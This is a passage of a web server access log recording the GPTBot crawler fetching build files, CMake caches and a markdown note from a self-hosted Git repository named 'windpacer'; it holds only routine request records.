+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 10240] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10228] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 31151] [Gzip 11.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10663] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10004] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:15:14:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4766] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 28166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:14:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 467] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:14:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10467] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/main.cpp" +[17/Feb/2026:15:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10397] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm" +[17/Feb/2026:15:14:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72034] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project" +[17/Feb/2026:15:14:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72684] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project" +[17/Feb/2026:15:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10191] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" +[17/Feb/2026:15:14:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10196] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" +[17/Feb/2026:15:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9926] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" +[17/Feb/2026:15:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11669] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" +[17/Feb/2026:15:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11103] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" +[17/Feb/2026:15:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11102] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" +[17/Feb/2026:15:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" +[17/Feb/2026:15:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:15:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" +[17/Feb/2026:15:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" +[17/Feb/2026:15:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" +[17/Feb/2026:15:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" +[17/Feb/2026:15:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10193] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" +[17/Feb/2026:15:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:15:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:15:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13345] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:15:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:15:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" +[17/Feb/2026:15:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" +[17/Feb/2026:15:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:15:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" +[17/Feb/2026:15:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13347] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:15:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" +[17/Feb/2026:15:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:15:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" +[17/Feb/2026:15:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:15:05 +0000] - 